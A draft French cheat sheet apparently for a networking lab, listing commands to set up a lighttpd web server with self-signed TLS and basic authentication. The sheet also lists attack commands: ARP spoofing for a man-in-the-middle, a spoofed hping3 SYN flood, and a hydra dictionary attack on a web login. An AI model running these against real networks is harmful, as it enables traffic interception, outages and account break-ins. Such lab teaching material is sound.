Show Menu
Cheatography

refcard_reseau Cheat Sheet (DRAFT) by

qz

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Config­uration et gestion du serveur web

# startx (Démarre l'inte­rface graphi­que.)
# mkdir /var/w­ww/html (Crée un répertoire pour les fichiers web.)
# busybox httpd -f -vv -h /var/w­ww/html (Démarre le serveur web avec le répertoire spécifié.)
# nano /etc/hosts (Modifie le fichier hosts pour ajouter des noms d'hôtes.)
# ping 127.0.0.1 (Vérifie que le serveur web est access­ible.)

Gestion de la sécurité et certif­icats SSL/TLS

# mkdir /etc/l­igh­ttp­d/s­ecurity (Crée un répertoire pour stocker les certif­icats SSL.)
# openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 -nodes -out alcest.crt -keyout alcest.key (Génère une clé privée et un certificat SSL auto-s­igné.)
# cat alcest.key alcest.crt > alcest.pem (Combine la clé privée et le certificat en un fichier PEM.)
# nano /etc/l­igh­ttp­d/c­onf­-en­abl­ed/­tls.conf (Ouvre le fichier de config­uration pour activer SSL/TLS.)
# echo "­<us­ern­ame­>:$­(bu­sybox httpd -m '<p­ass­wor­d>'­)" > /etc/l­igh­ttp­d/s­ecu­rit­y/a­lce­st.auth (Crée un fichier d'auth­ent­ifi­cation pour le serveur web.)
# systemctl start lighttpd (Démarre le serveur web sécurisé.)

Gestion du réseau et des attaques MITM

# echo 1 > /proc/­sys­/ne­t/i­pv4­/ip­_fo­rward (Active le forwarding IP.)
# arpspoof -t <@IP cible> <@IP usurpé­e> (Inter­cepte le trafic entre deux machines.)
# wireshark -i eth0 -k (Démarre Wireshark pour capturer le trafic réseau.)
 

Attaque par Denial of Service (DoS)

# hping3 --flood --syn --spoof <@IP source usurpé­e> <@IP victim­e> (Envoie un grand nombre de paquets SYN pour saturer une cible.)
# htop (Surveille l'util­isation des ressources système.)
# tcpdump -i any (Analyse le trafic réseau en temps réel.)

Réseau étendu et config­uration

# /sbin/­ifc­onfig (Affiche la config­uration réseau actuelle.)
# /mnt/n­ett­a/a­pps­/vn­et/­nem­u-vnet netadm (Lance le réseau virtuel sur le groupe princi­pal.)
# ip route add <ré­sea­u>/­<ma­squ­e> via <pa­sse­rel­le> (Ajoute une route pour un réseau spécif­ique.)
# ping <IP de l'autre machin­e> (Vérifie la connec­tivité avec une autre machine.)

Attaque par dictio­nnaire

# most /opt/w­ord­lis­t/p­lac­es.gz (Consulte le contenu d'un fichier de mots de passe.)
# hydra -V -f -l admin -P <fi­chier de mots de passe> http-g­et:­//<IP nightwish de l'autre groupe> (Effectue une attaque par dictio­nnaire sur le site web.)

Arrêt des services

# poweroff (Arrête proprement la machine.)
# save() (Sauve­garde l'état de la session.)
# quit() (Quitte l'envi­ron­nement princi­pal.)